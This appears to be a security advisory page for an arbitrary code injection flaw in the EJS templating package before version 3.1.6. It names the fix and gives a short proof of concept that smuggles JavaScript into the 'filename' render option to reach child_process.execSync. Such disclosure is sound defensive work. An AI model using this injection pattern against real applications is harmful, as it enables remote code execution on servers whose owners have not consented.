Arbitrary Code Injection Affecting org.webjars.npm:ejs package, versions [,3.1.6)
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGWEBJARSNPM-1062743
- published 20 Jan 2021
- disclosed 9 Dec 2020
- credit fangzequn
How to fix?
Upgrade org.webjars.npm:ejs
to version 3.1.6 or higher.
Overview
org.webjars.npm:ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render
and renderFile
. If external input is flowing into the options
parameter, an attacker is able run arbitrary code. This include the filename
, compileDebug
, and client
option.
POC
let ejs = require('ejs')
ejs.render('./views/test.ejs',{
filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
compileDebug: true,
message: 'test',
client: true
})
References
CVSS Scores
version 3.1